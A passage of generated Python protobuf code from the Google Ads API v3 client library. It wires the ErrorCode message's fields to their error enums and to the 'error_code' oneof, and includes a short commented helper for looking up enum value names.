_ERRORCODE.fields_by_name['authentication_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_authentication__error__pb2._AUTHENTICATIONERRORENUM_AUTHENTICATIONERROR
_ERRORCODE.fields_by_name['ad_group_criterion_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__group__criterion__error__pb2._ADGROUPCRITERIONERRORENUM_ADGROUPCRITERIONERROR
_ERRORCODE.fields_by_name['ad_customizer_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__customizer__error__pb2._ADCUSTOMIZERERRORENUM_ADCUSTOMIZERERROR
_ERRORCODE.fields_by_name['ad_group_ad_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__group__ad__error__pb2._ADGROUPADERRORENUM_ADGROUPADERROR
_ERRORCODE.fields_by_name['ad_sharing_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__sharing__error__pb2._ADSHARINGERRORENUM_ADSHARINGERROR
_ERRORCODE.fields_by_name['adx_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_adx__error__pb2._ADXERRORENUM_ADXERROR
_ERRORCODE.fields_by_name['asset_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_asset__error__pb2._ASSETERRORENUM_ASSETERROR
_ERRORCODE.fields_by_name['bidding_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_bidding__error__pb2._BIDDINGERRORENUM_BIDDINGERROR
_ERRORCODE.fields_by_name['campaign_criterion_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_campaign__criterion__error__pb2._CAMPAIGNCRITERIONERRORENUM_CAMPAIGNCRITERIONERROR
_ERRORCODE.fields_by_name['collection_size_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_collection__size__error__pb2._COLLECTIONSIZEERRORENUM_COLLECTIONSIZEERROR
_ERRORCODE.fields_by_name['country_code_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_country__code__error__pb2._COUNTRYCODEERRORENUM_COUNTRYCODEERROR
_ERRORCODE.fields_by_name['criterion_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_criterion__error__pb2._CRITERIONERRORENUM_CRITERIONERROR
_ERRORCODE.fields_by_name['customer_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_customer__error__pb2._CUSTOMERERRORENUM_CUSTOMERERROR
_ERRORCODE.fields_by_name['date_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_date__error__pb2._DATEERRORENUM_DATEERROR
_ERRORCODE.fields_by_name['date_range_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_date__range__error__pb2._DATERANGEERRORENUM_DATERANGEERROR
_ERRORCODE.fields_by_name['distinct_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_distinct__error__pb2._DISTINCTERRORENUM_DISTINCTERROR
_ERRORCODE.fields_by_name['feed_attribute_reference_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_feed__attribute__reference__error__pb2._FEEDATTRIBUTEREFERENCEERRORENUM_FEEDATTRIBUTEREFERENCEERROR
_ERRORCODE.fields_by_name['function_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_function__error__pb2._FUNCTIONERRORENUM_FUNCTIONERROR
_ERRORCODE.fields_by_name['function_parsing_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_function__parsing__error__pb2._FUNCTIONPARSINGERRORENUM_FUNCTIONPARSINGERROR
_ERRORCODE.fields_by_name['id_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_id__error__pb2._IDERRORENUM_IDERROR
_ERRORCODE.fields_by_name['image_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_image__error__pb2._IMAGEERRORENUM_IMAGEERROR
_ERRORCODE.fields_by_name['language_code_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_language__code__error__pb2._LANGUAGECODEERRORENUM_LANGUAGECODEERROR
_ERRORCODE.fields_by_name['media_bundle_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_media__bundle__error__pb2._MEDIABUNDLEERRORENUM_MEDIABUNDLEERROR
_ERRORCODE.fields_by_name['media_upload_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_media__upload__error__pb2._MEDIAUPLOADERRORENUM_MEDIAUPLOADERROR
_ERRORCODE.fields_by_name['media_file_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_media__file__error__pb2._MEDIAFILEERRORENUM_MEDIAFILEERROR
_ERRORCODE.fields_by_name['multiplier_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_multiplier__error__pb2._MULTIPLIERERRORENUM_MULTIPLIERERROR
_ERRORCODE.fields_by_name['new_resource_creation_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_new__resource__creation__error__pb2._NEWRESOURCECREATIONERRORENUM_NEWRESOURCECREATIONERROR
_ERRORCODE.fields_by_name['not_empty_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_not__empty__error__pb2._NOTEMPTYERRORENUM_NOTEMPTYERROR
_ERRORCODE.fields_by_name['null_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_null__error__pb2._NULLERRORENUM_NULLERROR
_ERRORCODE.fields_by_name['operator_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_operator__error__pb2._OPERATORERRORENUM_OPERATORERROR
_ERRORCODE.fields_by_name['range_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_range__error__pb2._RANGEERRORENUM_RANGEERROR
_ERRORCODE.fields_by_name['recommendation_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_recommendation__error__pb2._RECOMMENDATIONERRORENUM_RECOMMENDATIONERROR
_ERRORCODE.fields_by_name['region_code_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_region__code__error__pb2._REGIONCODEERRORENUM_REGIONCODEERROR
_ERRORCODE.fields_by_name['setting_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_setting__error__pb2._SETTINGERRORENUM_SETTINGERROR
_ERRORCODE.fields_by_name['string_format_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_string__format__error__pb2._STRINGFORMATERRORENUM_STRINGFORMATERROR
_ERRORCODE.fields_by_name['string_length_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_string__length__error__pb2._STRINGLENGTHERRORENUM_STRINGLENGTHERROR
_ERRORCODE.fields_by_name['operation_access_denied_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_operation__access__denied__error__pb2._OPERATIONACCESSDENIEDERRORENUM_OPERATIONACCESSDENIEDERROR
_ERRORCODE.fields_by_name['resource_access_denied_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_resource__access__denied__error__pb2._RESOURCEACCESSDENIEDERRORENUM_RESOURCEACCESSDENIEDERROR
_ERRORCODE.fields_by_name['resource_count_limit_exceeded_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_resource__count__limit__exceeded__error__pb2._RESOURCECOUNTLIMITEXCEEDEDERRORENUM_RESOURCECOUNTLIMITEXCEEDEDERROR
_ERRORCODE.fields_by_name['youtube_video_registration_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_youtube__video__registration__error__pb2._YOUTUBEVIDEOREGISTRATIONERRORENUM_YOUTUBEVIDEOREGISTRATIONERROR
_ERRORCODE.fields_by_name['ad_group_bid_modifier_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__group__bid__modifier__error__pb2._ADGROUPBIDMODIFIERERRORENUM_ADGROUPBIDMODIFIERERROR
_ERRORCODE.fields_by_name['context_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_context__error__pb2._CONTEXTERRORENUM_CONTEXTERROR
_ERRORCODE.fields_by_name['field_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_field__error__pb2._FIELDERRORENUM_FIELDERROR
_ERRORCODE.fields_by_name['shared_set_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_shared__set__error__pb2._SHAREDSETERRORENUM_SHAREDSETERROR
_ERRORCODE.fields_by_name['shared_criterion_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_shared__criterion__error__pb2._SHAREDCRITERIONERRORENUM_SHAREDCRITERIONERROR
_ERRORCODE.fields_by_name['campaign_shared_set_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_campaign__shared__set__error__pb2._CAMPAIGNSHAREDSETERRORENUM_CAMPAIGNSHAREDSETERROR
_ERRORCODE.fields_by_name['conversion_action_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_conversion__action__error__pb2._CONVERSIONACTIONERRORENUM_CONVERSIONACTIONERROR
_ERRORCODE.fields_by_name['conversion_adjustment_upload_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_conversion__adjustment__upload__error__pb2._CONVERSIONADJUSTMENTUPLOADERRORENUM_CONVERSIONADJUSTMENTUPLOADERROR
_ERRORCODE.fields_by_name['conversion_upload_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_conversion__upload__error__pb2._CONVERSIONUPLOADERRORENUM_CONVERSIONUPLOADERROR
_ERRORCODE.fields_by_name['header_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_header__error__pb2._HEADERERRORENUM_HEADERERROR
_ERRORCODE.fields_by_name['database_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_database__error__pb2._DATABASEERRORENUM_DATABASEERROR
_ERRORCODE.fields_by_name['policy_finding_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_policy__finding__error__pb2._POLICYFINDINGERRORENUM_POLICYFINDINGERROR
_ERRORCODE.fields_by_name['enum_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_enum__error__pb2._ENUMERRORENUM_ENUMERROR
_ERRORCODE.fields_by_name['keyword_plan_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_keyword__plan__error__pb2._KEYWORDPLANERRORENUM_KEYWORDPLANERROR
_ERRORCODE.fields_by_name['keyword_plan_campaign_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_keyword__plan__campaign__error__pb2._KEYWORDPLANCAMPAIGNERRORENUM_KEYWORDPLANCAMPAIGNERROR
_ERRORCODE.fields_by_name['keyword_plan_negative_keyword_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_keyword__plan__negative__keyword__error__pb2._KEYWORDPLANNEGATIVEKEYWORDERRORENUM_KEYWORDPLANNEGATIVEKEYWORDERROR
_ERRORCODE.fields_by_name['keyword_plan_ad_group_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_keyword__plan__ad__group__error__pb2._KEYWORDPLANADGROUPERRORENUM_KEYWORDPLANADGROUPERROR
_ERRORCODE.fields_by_name['keyword_plan_keyword_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_keyword__plan__keyword__error__pb2._KEYWORDPLANKEYWORDERRORENUM_KEYWORDPLANKEYWORDERROR
_ERRORCODE.fields_by_name['keyword_plan_idea_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_keyword__plan__idea__error__pb2._KEYWORDPLANIDEAERRORENUM_KEYWORDPLANIDEAERROR
_ERRORCODE.fields_by_name['account_budget_proposal_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_account__budget__proposal__error__pb2._ACCOUNTBUDGETPROPOSALERRORENUM_ACCOUNTBUDGETPROPOSALERROR
_ERRORCODE.fields_by_name['user_list_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_user__list__error__pb2._USERLISTERRORENUM_USERLISTERROR
_ERRORCODE.fields_by_name['change_status_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_change__status__error__pb2._CHANGESTATUSERRORENUM_CHANGESTATUSERROR
_ERRORCODE.fields_by_name['feed_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_feed__error__pb2._FEEDERRORENUM_FEEDERROR
_ERRORCODE.fields_by_name['geo_target_constant_suggestion_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_geo__target__constant__suggestion__error__pb2._GEOTARGETCONSTANTSUGGESTIONERRORENUM_GEOTARGETCONSTANTSUGGESTIONERROR
_ERRORCODE.fields_by_name['campaign_draft_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_campaign__draft__error__pb2._CAMPAIGNDRAFTERRORENUM_CAMPAIGNDRAFTERROR
_ERRORCODE.fields_by_name['feed_item_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_feed__item__error__pb2._FEEDITEMERRORENUM_FEEDITEMERROR
_ERRORCODE.fields_by_name['label_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_label__error__pb2._LABELERRORENUM_LABELERROR
_ERRORCODE.fields_by_name['billing_setup_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_billing__setup__error__pb2._BILLINGSETUPERRORENUM_BILLINGSETUPERROR
_ERRORCODE.fields_by_name['customer_client_link_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_customer__client__link__error__pb2._CUSTOMERCLIENTLINKERRORENUM_CUSTOMERCLIENTLINKERROR
_ERRORCODE.fields_by_name['customer_manager_link_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_customer__manager__link__error__pb2._CUSTOMERMANAGERLINKERRORENUM_CUSTOMERMANAGERLINKERROR
_ERRORCODE.fields_by_name['feed_mapping_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_feed__mapping__error__pb2._FEEDMAPPINGERRORENUM_FEEDMAPPINGERROR
_ERRORCODE.fields_by_name['customer_feed_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_customer__feed__error__pb2._CUSTOMERFEEDERRORENUM_CUSTOMERFEEDERROR
_ERRORCODE.fields_by_name['ad_group_feed_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__group__feed__error__pb2._ADGROUPFEEDERRORENUM_ADGROUPFEEDERROR
_ERRORCODE.fields_by_name['campaign_feed_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_campaign__feed__error__pb2._CAMPAIGNFEEDERRORENUM_CAMPAIGNFEEDERROR
_ERRORCODE.fields_by_name['custom_interest_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_custom__interest__error__pb2._CUSTOMINTERESTERRORENUM_CUSTOMINTERESTERROR
_ERRORCODE.fields_by_name['campaign_experiment_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_campaign__experiment__error__pb2._CAMPAIGNEXPERIMENTERRORENUM_CAMPAIGNEXPERIMENTERROR
_ERRORCODE.fields_by_name['extension_feed_item_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_extension__feed__item__error__pb2._EXTENSIONFEEDITEMERRORENUM_EXTENSIONFEEDITEMERROR
_ERRORCODE.fields_by_name['ad_parameter_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__parameter__error__pb2._ADPARAMETERERRORENUM_ADPARAMETERERROR
_ERRORCODE.fields_by_name['feed_item_validation_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_feed__item__validation__error__pb2._FEEDITEMVALIDATIONERRORENUM_FEEDITEMVALIDATIONERROR
_ERRORCODE.fields_by_name['extension_setting_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_extension__setting__error__pb2._EXTENSIONSETTINGERRORENUM_EXTENSIONSETTINGERROR
_ERRORCODE.fields_by_name['feed_item_target_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_feed__item__target__error__pb2._FEEDITEMTARGETERRORENUM_FEEDITEMTARGETERROR
_ERRORCODE.fields_by_name['policy_violation_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_policy__violation__error__pb2._POLICYVIOLATIONERRORENUM_POLICYVIOLATIONERROR
_ERRORCODE.fields_by_name['mutate_job_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_mutate__job__error__pb2._MUTATEJOBERRORENUM_MUTATEJOBERROR
_ERRORCODE.fields_by_name['partial_failure_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_partial__failure__error__pb2._PARTIALFAILUREERRORENUM_PARTIALFAILUREERROR
_ERRORCODE.fields_by_name['policy_validation_parameter_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_policy__validation__parameter__error__pb2._POLICYVALIDATIONPARAMETERERRORENUM_POLICYVALIDATIONPARAMETERERROR
_ERRORCODE.fields_by_name['size_limit_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_size__limit__error__pb2._SIZELIMITERRORENUM_SIZELIMITERROR
_ERRORCODE.fields_by_name['offline_user_data_job_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_offline__user__data__job__error__pb2._OFFLINEUSERDATAJOBERRORENUM_OFFLINEUSERDATAJOBERROR
_ERRORCODE.fields_by_name['not_whitelisted_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_not__whitelisted__error__pb2._NOTWHITELISTEDERRORENUM_NOTWHITELISTEDERROR
_ERRORCODE.fields_by_name['manager_link_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_manager__link__error__pb2._MANAGERLINKERRORENUM_MANAGERLINKERROR
_ERRORCODE.fields_by_name['currency_code_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_currency__code__error__pb2._CURRENCYCODEERRORENUM_CURRENCYCODEERROR
_ERRORCODE.fields_by_name['access_invitation_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_access__invitation__error__pb2._ACCESSINVITATIONERRORENUM_ACCESSINVITATIONERROR
_ERRORCODE.fields_by_name['reach_plan_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_reach__plan__error__pb2._REACHPLANERRORENUM_REACHPLANERROR
_ERRORCODE.fields_by_name['invoice_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_invoice__error__pb2._INVOICEERRORENUM_INVOICEERROR
_ERRORCODE.fields_by_name['payments_account_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_payments__account__error__pb2._PAYMENTSACCOUNTERRORENUM_PAYMENTSACCOUNTERROR
_ERRORCODE.fields_by_name['time_zone_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_time__zone__error__pb2._TIMEZONEERRORENUM_TIMEZONEERROR
_ERRORCODE.fields_by_name['asset_link_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_asset__link__error__pb2._ASSETLINKERRORENUM_ASSETLINKERROR
_ERRORCODE.fields_by_name['user_data_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_user__data__error__pb2._USERDATAERRORENUM_USERDATAERROR
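# --- Hedged usage sketch (editorial addition, not emitted by protoc) ---
# Each assignment above links an ErrorCode field to the enum generated in
# its own *_error_pb2 module. That linkage is what lets a numeric wire
# value be mapped back to its symbolic proto name through the standard
# descriptor API; `field_name` and `value` below are illustrative inputs.
def _enum_value_name(field_name, value):
  """Return the proto name for `value` of the given ErrorCode enum field."""
  enum_descriptor = _ERRORCODE.fields_by_name[field_name].enum_type
  return enum_descriptor.values_by_number[value].name
# e.g. _enum_value_name('quota_error', 0) -> 'UNSPECIFIED'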
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['request_error'])
_ERRORCODE.fields_by_name['request_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['bidding_strategy_error'])
_ERRORCODE.fields_by_name['bidding_strategy_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['url_field_error'])
_ERRORCODE.fields_by_name['url_field_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['list_operation_error'])
_ERRORCODE.fields_by_name['list_operation_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['query_error'])
_ERRORCODE.fields_by_name['query_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['mutate_error'])
_ERRORCODE.fields_by_name['mutate_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['field_mask_error'])
_ERRORCODE.fields_by_name['field_mask_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['authorization_error'])
_ERRORCODE.fields_by_name['authorization_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['internal_error'])
_ERRORCODE.fields_by_name['internal_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['quota_error'])
_ERRORCODE.fields_by_name['quota_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['ad_error'])
_ERRORCODE.fields_by_name['ad_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['ad_group_error'])
_ERRORCODE.fields_by_name['ad_group_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['campaign_budget_error'])
_ERRORCODE.fields_by_name['campaign_budget_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['campaign_error'])
_ERRORCODE.fields_by_name['campaign_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['authentication_error'])
_ERRORCODE.fields_by_name['authentication_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['ad_group_criterion_error'])
_ERRORCODE.fields_by_name['ad_group_criterion_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['ad_customizer_error'])
_ERRORCODE.fields_by_name['ad_customizer_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['ad_group_ad_error'])
_ERRORCODE.fields_by_name['ad_group_ad_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['ad_sharing_error'])
_ERRORCODE.fields_by_name['ad_sharing_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['adx_error'])
_ERRORCODE.fields_by_name['adx_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['asset_error'])
_ERRORCODE.fields_by_name['asset_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['bidding_error'])
_ERRORCODE.fields_by_name['bidding_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['campaign_criterion_error'])
_ERRORCODE.fields_by_name['campaign_criterion_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['collection_size_error'])
_ERRORCODE.fields_by_name['collection_size_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['country_code_error'])
_ERRORCODE.fields_by_name['country_code_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['criterion_error'])
_ERRORCODE.fields_by_name['criterion_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['customer_error'])
_ERRORCODE.fields_by_name['customer_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['date_error'])
_ERRORCODE.fields_by_name['date_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['date_range_error'])
_ERRORCODE.fields_by_name['date_range_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['distinct_error'])
_ERRORCODE.fields_by_name['distinct_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['feed_attribute_reference_error'])
_ERRORCODE.fields_by_name['feed_attribute_reference_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['function_error'])
_ERRORCODE.fields_by_name['function_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['function_parsing_error'])
_ERRORCODE.fields_by_name['function_parsing_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['id_error'])
_ERRORCODE.fields_by_name['id_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['image_error'])
_ERRORCODE.fields_by_name['image_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['language_code_error'])
_ERRORCODE.fields_by_name['language_code_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['media_bundle_error'])
_ERRORCODE.fields_by_name['media_bundle_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['media_upload_error'])
_ERRORCODE.fields_by_name['media_upload_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['media_file_error'])
_ERRORCODE.fields_by_name['media_file_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['multiplier_error'])
_ERRORCODE.fields_by_name['multiplier_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['new_resource_creation_error'])
_ERRORCODE.fields_by_name['new_resource_creation_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['not_empty_error'])
